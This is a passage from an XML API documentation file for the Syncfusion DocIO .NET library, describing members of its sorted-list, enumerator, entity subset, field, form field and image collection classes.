            Gets or sets the value associated with the specified key.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator.m_list">
            <summary>
            List for which is this enumerator.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator.m_key">
            <summary>
            Key of the current element.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator.m_value">
            <summary>
            Values of the current element.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator.m_iIndex">
            <summary>
            Index of current element.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator.m_iStartIndex">
            <summary>
            Starting index for the enumerator.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator.m_iEndIndex">
            <summary>
            Ending index for this enumerator.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator.m_iVersion">
            <summary>
            Version of collection data.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator.m_bCurrent">
            <summary>
            True if current element is correct, False otherwise
            (before beginning or after end).
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator.#ctor(Syncfusion.DocIO.DLS.TypedSortedListEx{`0,`1},System.Int32,System.Int32)">
            <summary>
            Creates enumerator for specified list, starting from specified index
            and with specified count.
            </summary>
            <param name="list">List for which enumerator is being created.</param>
            <param name="index">Starting index.</param>
            <param name="count">Number of elements to enumerate.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator.Dispose">
            <summary>
            Performs application-defined tasks associated with freeing, releasing, or
            resetting unmanaged resources.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator.Clone">
            <summary>
            Creates a new object that is a copy of the current instance.
            </summary>
            <returns>Copy of the current instance.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator.MoveNext">
            <summary>
            Advances the enumerator to the next element of the collection.
            </summary>
            <returns>
            True if the enumerator was successfully advanced to the next element;
            False if the enumerator has passed the end of the collection.
            </returns>
            <exception cref="T:System.InvalidOperationException">
            When the current version is not equal to the SortedListEx version.
            </exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator.Reset">
            <summary>
            Sets the enumerator to its initial position, which is before
            the first element in the collection.
            </summary>
            <exception cref="T:System.InvalidOperationException">
            When the current version is not equal to the SortedListEx version.
            </exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator.Key">
            <summary>
            Returns key of the current element. Read-only.
            </summary>
            <exception cref="T:System.InvalidOperationException">
            When the current version is not equal to the SortedListEx version
            or if current is false.
            </exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator.Entry">
            <summary>
            Return DictionaryEntry for the current element.
            </summary>
            <exception cref="T:System.InvalidOperationException">
            When the current version is not equal to the SortedListEx version
            or if current is false.
            </exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator.Current">
            <summary>
            The current element in the collection. Read-only.
            </summary>
            <exception cref="T:System.InvalidOperationException">
            If current is false.
            </exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator.System#Collections#IEnumerator#Current">
            <summary>
            The current element in the collection. Read-only.
            </summary>
            <exception cref="T:System.InvalidOperationException">
            If current is false.
            </exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.TypedSortedListExEnumerator.Value">
            <summary>
            Returns value for the current element.
            </summary>
            <exception cref="T:System.InvalidOperationException">
            When the current version is not equal to the SortedListEx version
            or if current is false.
            </exception>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeysEnumerator">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeysEnumerator.m_list">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeysEnumerator.m_iIndex">
            <summary>
            Index of current element.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeysEnumerator.m_iVersion">
            <summary>
            Version of collection data.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeysEnumerator.#ctor(Syncfusion.DocIO.DLS.TypedSortedListEx{`0,`1})">
            <summary>
            
            </summary>
            <param name="list"></param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeysEnumerator.Current">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.m_list">
            <summary>
            List for which this collection was created.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.#ctor(Syncfusion.DocIO.DLS.TypedSortedListEx{`0,`1})">
            <summary>
            Creates KeyList for specified SortedListEx.
            </summary>
            <param name="list">TypedSortedListEx for which KeyList must be created.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.Add(`0)">
            <summary>
            Adds an element with the provided key to the list.
            </summary>
            <param name="key">The Object to use as the key of the element to add.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.Clear">
            <summary>
            Removes all elements from the collection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.Contains(`0)">
            <summary>
            Determines whether the list contains an element with the specified key.
            </summary>
            <param name="key">Key of the element to search.</param>
            <returns>True if list contains specified key.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.CopyTo(`0[],System.Int32)">
            <summary>
            Copies all the elements of the list to the specified one-dimensional Array
            starting at the specified destination Array index.
            </summary>
            <param name="array">The one-dimensional Array that is the destination of the
            elements copied from the current list.</param>
            <param name="arrayIndex">The index in array at which copying begins.</param>
            <exception cref="T:System.ArgumentException">
            If array is null or rank of the array is not 1.
            </exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.CopyTo(System.Array,System.Int32)">
            <summary>
            Copies all the elements of the list to the specified one-dimensional Array
            starting at the specified destination Array index.
            </summary>
            <param name="array">The one-dimensional Array that is the destination of the
            elements copied from the current list.</param>
            <param name="arrayIndex">The index in array at which copying begins.</param>
            <exception cref="T:System.ArgumentException">
            If array is null or rank of the array is not 1.
            </exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.Insert(System.Int32,`0)">
            <summary>
            Insert the value at the specific index.
            </summary>
            <param name="index">The zero-based index at which to save value.</param>
            <param name="value">The Object to save into. Can be NULL.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.System#Collections#IEnumerable#GetEnumerator">
            <summary>
            Returns an IEnumerator that can iterate through the list.
            </summary>
            <returns>An IEnumerator for the list.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.GetEnumerator">
            <summary>
            Returns an IEnumerator that can iterate through the list.
            </summary>
            <returns>An IEnumerator for the list.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.IndexOf(`0)">
            <summary>
            Returns the zero-based index of the specified key.
            </summary>
            <param name="key">The key to locate.</param>
            <returns>The zero-based index of the key, if the key is found; otherwise, -1.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.Remove(`0)">
             <summary>
            Removes the element with the specified key from list.
             </summary>
             <param name="key">The key of the element to remove.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.RemoveAt(System.Int32)">
            <summary>
            Removes the element at the specified index from the list.
            </summary>
            <param name="index">The zero-based index of the element to remove.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.Count">
            <summary>
            Size of the collection. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.IsReadOnly">
            <summary>
            Returns True if list is readonly, False otherwise. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.IsFixedSize">
            <summary>
            Returns True if collection has fixed size, False otherwise.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.IsSynchronized">
            <summary>
            Returns True if the collection is synchronized, False otherwise.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.SyncRoot">
            <summary>
            Returns the object that can be used to synchronize access to the collection.
            Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.KeyList.Item(System.Int32)">
            <summary>
            Gets or sets the key at the specified index.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.m_list">
            <summary>
            List for which this collection was created.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.vals">
            <summary>
            Array that contain values.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.#ctor(Syncfusion.DocIO.DLS.TypedSortedListEx{`0,`1})">
            <summary>
            Creates ValueList for specified SortedListEx.
            </summary>
            <param name="list">List for which ValueList must be created.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.UpdateValues">
            <summary>
            Re-read values from the list.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.Add(`1)">
            <summary>
            Adds an element with the provided key to the list.
            </summary>
            <param name="value">Value to add.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.Clear">
            <summary>
            Removes all elements from the collection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.Contains(`1)">
            <summary>
            Determines whether the list contains an element with the specified value.
            </summary>
            <param name="value">Value to search.</param>
            <returns>True if list contains specified value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.CopyTo(`1[],System.Int32)">
            <summary>
            Copies all the elements of the list to the specified one-dimensional Array
            starting at the specified destination Array index.
            </summary>
            <param name="array">The one-dimensional Array that is the destination of the
            elements copied from the current list.</param>
            <param name="arrayIndex">The index in array at which copying begins.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.CopyTo(System.Array,System.Int32)">
            <summary>
            Copies all the elements of the list to the specified one-dimensional Array
            starting at the specified destination Array index.
            </summary>
            <param name="array">The one-dimensional Array that is the destination of the
            elements copied from the current list.</param>
            <param name="arrayIndex">The index in array at which copying begins.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.Insert(System.Int32,`1)">
            <summary>
            Insert the value at the specific index.
            </summary>
            <param name="index">The zero-based index at which to save value.</param>
            <param name="value">The Object to save into. Can be NULL.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.System#Collections#IEnumerable#GetEnumerator">
            <summary>
            Returns an IEnumerator that can iterate through the list.
            </summary>
            <returns>An IEnumerator for the list.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.GetEnumerator">
            <summary>
            Returns an IEnumerator that can iterate through the list.
            </summary>
            <returns>An IEnumerator for the list.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.IndexOf(`1)">
            <summary>
            Returns the zero-based index of the specified value.
            </summary>
            <param name="value">The value to locate.</param>
            <returns>The zero-based index of the value, if the value is found, otherwise -1.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.Remove(`1)">
             <summary>
            Removes the specified value from list.
             </summary>
             <param name="value">The value to remove.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.RemoveAt(System.Int32)">
            <summary>
            Removes the element at the specified index from the list.
            </summary>
            <param name="index">The zero-based index of the element to remove.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.Count">
            <summary>
            Size of the collection. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.IsReadOnly">
            <summary>
            Returns True if list is readonly, False otherwise. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.IsFixedSize">
            <summary>
            Returns True if collection has fixed size, False otherwise.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.IsSynchronized">
            <summary>
            Returns True if the collection is synchronized, False otherwise.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.SyncRoot">
            <summary>
            Returns the object that can be used to synchronize access to the collection.
            Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TypedSortedListEx`2.ValueList.Item(System.Int32)">
            <summary>
            Gets or sets the value at the specified index.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOSortedList`2.#ctor">
            <summary>
            Initialiazes a new instance of <see cref="!:DocIOSortedList"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOSortedList`2.#ctor(System.Collections.Generic.IComparer{`0})">
            <summary>
            Initializes  a new instance of <see cref="!:DocIOSortedList"/> class with the specified comparer.
            </summary>
            <param name="comparer">The <see cref="!:System.Collections.Generic.IComparer"/><T> implementation to use when comparing elements.</T></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOSortedList`2.#ctor(System.Int32)">
            <summary>
            Initializes  a new instance of <see cref="!:DocIOSortedList"/> class with the specified length.
            </summary>
            <param name="count">The length of the range to sort.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocIOSortedList`2.#ctor(System.Collections.Generic.IDictionary{`0,`1})">
            <summary>
            Initializes a new instance of <see cref="!:DocIOSortedList"/> class from the existing dictionary collection.
            </summary>
            <param name="dictionary">The <see cref="!:System.Collections.Generic.IDictionary"/> to copy.</param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.SortedDictionary`2">
            <summary>
            Represents the sorting of dictionary collection.
            </summary>
            <typeparam name="TKey">The type of the key.</typeparam>
            <typeparam name="TValue">The type of the value.</typeparam>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.EntitySubsetCollection">
            <summary>
            Represents a subset from the collection of specified type entities.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntitySubsetCollection.m_coll">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.#ctor(Syncfusion.DocIO.DLS.EntityCollection,Syncfusion.DocIO.DLS.EntityType)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.EntitySubsetCollection"/> class.
            </summary>
            <param name="coll">The collection.</param>
            <param name="type">The type.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.Clear">
            <summary>
            Removes all the entities from the collection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.GetEnumerator">
            <summary>
            Returns an enumerator that iterates through a collection.
            </summary>
            <returns>
            An <see cref="T:System.Collections.IEnumerator"/> object that can be used to iterate through the collection.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.InternalAdd(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Adds the entity to the end of collection.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.InternalContains(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Determines whether a entity is in the collection.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.InternalIndexOf(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Returns the zero-based index of the specified entity.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.InternalInsert(System.Int32,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Inserts a entity into the collection at the specified index. 
            </summary>
            <param name="index"></param>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.InternalRemove(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Removes the entity from the collection.
            </summary>
            <param name="entity"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.InternalRemoveAt(System.Int32)">
            <summary>
            Removes the entity at the specified index from the collection.
            </summary>
            <param name="index">The index.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.GetByIndex(System.Int32)">
            <summary>
            Gets the entity by its index.
            <exclude/>
            </summary>
            <param name="index">The zero-based index of the entity.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> at the specified index.</returns>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid in the <see cref="T:Syncfusion.DocIO.DLS.EntitySubsetCollection"/>.</exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.GetBaseIndex(System.Int32)">
            <summary>
            Gets the base index.
            </summary>
            <param name="index">The index.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.UpdateCount">
            <summary>
            Updates the count.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.CheckType(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Checks the type.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.BaseCollChangeItems(Syncfusion.DocIO.DLS.EntityCollection.ChangeItemsType,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Calls when in base collection changed items.
            </summary>
            <param name="type">The type.</param>
            <param name="entity">The entity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.ClearIndexes">
            <summary>
            Clears the indexes.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EntitySubsetCollection.Document">
            <summary>
            Gets the current document. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EntitySubsetCollection.Owner">
            <summary>
            Gets the owner of this <see cref="T:Syncfusion.DocIO.DLS.EntitySubsetCollection"/>. Ready-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> which is the owner element.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EntitySubsetCollection.Count">
            <summary>
            Gets the number of items in collection.
            </summary>
            <value>The <b>integer</b> that represents the count of the items.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EntitySubsetCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.Entity"/> at the specified index.
            </summary>
            <param name="index">The zero-based index of the entity to get.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> at the specified index.</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid index in the <see cref="T:Syncfusion.DocIO.DLS.IEntityCollectionBase"/>.</exception>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.EntitySubsetCollection.SubSetEnumerator">
            <summary>
            Represents a internal enumerator for EntitySubSetCollection. 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.SubSetEnumerator.#ctor(Syncfusion.DocIO.DLS.EntitySubsetCollection)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.EntitySubsetCollection.SubSetEnumerator"/> class.
            </summary>
            <param name="enColl">The entities collection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.SubSetEnumerator.MoveNext">
            <summary>
            Advances the enumerator to the next element of the collection.
            </summary>
            <returns>
            <b>True</b> if the enumerator was successfully advanced to the next element; <b>false</b> if the enumerator has passed the end of the collection.
            </returns>
            <exception cref="T:System.InvalidOperationException">The collection was modified after the enumerator was created. </exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntitySubsetCollection.SubSetEnumerator.Reset">
            <summary>
            Sets the enumerator to its initial position, which is before the first element in the collection.
            </summary>
            <exception cref="T:System.InvalidOperationException">The collection was modified after the enumerator was created. </exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EntitySubsetCollection.SubSetEnumerator.Current">
            <summary>
            Gets the current element in the collection.
            </summary>
            <value>The current element in the collection.</value>
            <exception cref="T:System.InvalidOperationException">The enumerator is positioned before the first element of the collection or after the last element. </exception>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.FieldCollection">
            <summary>
            A collection of <see cref="T:Syncfusion.DocIO.DLS.WField"/> objects that 
            represent the fields in the document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FieldCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.FieldCollection"/> class.
            </summary>
            <param name="doc">The document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FieldCollection.FindByName(System.String)">
            <summary>
            Finds <see cref="T:Syncfusion.DocIO.DLS.WField"/> object by specified name
            </summary>
            <param name="name">The Field value</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FieldCollection.RemoveAt(System.Int32)">
            <summary>
            Removes a Field at the specified index.
            </summary>
            <param name="index">The index.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FieldCollection.Remove(Syncfusion.DocIO.DLS.WField)">
            <summary>
            Removes the specified field.
            </summary>
            <param name="field">The field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FieldCollection.Clear">
            <summary>
            Removes all Fields from the document. 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FieldCollection.Add(Syncfusion.DocIO.DLS.WField)">
            <summary>
            Adds field objects to the collection.
            </summary>
            <param name="bookmark"></param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FieldCollection.Item(System.String)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.WField"/> with the specified name.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FieldCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.WField"/> at the specified index.
            </summary>
            <value></value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.FormFieldCollection">
            <summary>
            Represents a collection of form fields.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldCollection.#ctor(Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.FormFieldCollection"/> class.
            </summary>
            <param name="textBody">The text body.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldCollection.ContainsName(System.String)">
            <summary>
            Returns value indicating whether the specified collection contains item with specified name.
            </summary>
            <param name="itemName">The <b>string</b> that specifies the name of the item to be found.</param>
            <returns><b>True </b> if the collection has the specified form field, otherwise <b>false</b>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldCollection.CorrectName(System.String,System.String)">
            <summary>
            Corrects the name.
            </summary>
            <param name="oldName">The old name.</param>
            <param name="newName">The new name.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldCollection.Add(Syncfusion.DocIO.DLS.WFormField)">
            <summary>
            Adds the specified formField.
            </summary>
            <param name="ff">The formField.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldCollection.Remove(Syncfusion.DocIO.DLS.WFormField)">
            <summary>
            Removes the specified formField.
            </summary>
            <param name="ff">The formField.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldCollection.Populate(Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Populates this coollection of form fields from parent WTextBody.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldCollection.PopulateFromParagraph(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Populates from paragraph.
            </summary>
            <param name="para">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldCollection.PopulateFromTable(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Populates from table.
            </summary>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldCollection.GetByName(System.String)">
            <summary>
            Gets form field by name.
            </summary>
            <param name="formFieldName">Name of the form field.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormFieldCollection.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FormFieldCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.WFormField"/> at the specified index. Read-only.
            </summary>
            <param name="index">The zero-based index of the form field to get.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WFormField"/> at the specified index.</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid in the <see cref="T:Syncfusion.DocIO.DLS.FormFieldCollection"/>.</exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FormFieldCollection.Item(System.String)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.WFormField"/> with specified name. Read-only.
            </summary>
            <param name="formFieldName">The <b>string</b> that specifies the form field name.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WFormField"/> with the specified name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FormFieldCollection.FormFieldDictonary">
            <summary>
            Gets dictionary with form field items.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.ImageCollection"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageCollection.Add(Syncfusion.DocIO.DLS.ImageRecord)">
            <summary>
            Adds the specified image.
            </summary>
            <param name="image">The image.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageCollection.Remove(System.Int32)">
            <summary>
            Removes the specified image id.
            </summary>
            <param name="imageId">The image id.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageCollection.Clear">
            <summary>
            Clears this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageCollection.LoadImage(System.Byte[])">
            <summary>
            Loads the image.
            </summary>
            <param name="imageBytes">The image bytes.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageCollection.LoadMetaFileImage(System.Byte[],System.Boolean)">
            <summary>
            Loads the meta file image.
            </summary>
            <param name="imageBytes">The image bytes.</param>
            <param name="isCompressed">if set to <c>true</c> [is compressed].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageCollection.LoadXmlItemImage(System.Byte[])">
            <summary>
            Loads the image.
            </summary>
            <param name="imageBytes">The image bytes.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageCollection.CompressImageBytes(System.Byte[])">
            <summary>
            Compresses the image bytes.
            </summary>
            <param name="imageBytes">The image bytes.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageCollection.DecompressImageBytes(System.Byte[])">
            <summary>
            Decompresses the image bytes.
            </summary>
            <param name="compressedImage">The compressed image.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.ImageRecord"/> with the specified image id.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageCollection.Document">
            <summary>
            Gets the owner document.
            </summary>
            <value>The document.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ListLevelCollection">
            <summary>
            Represents a collections of list formatting for each levels in a list.
            </summary>
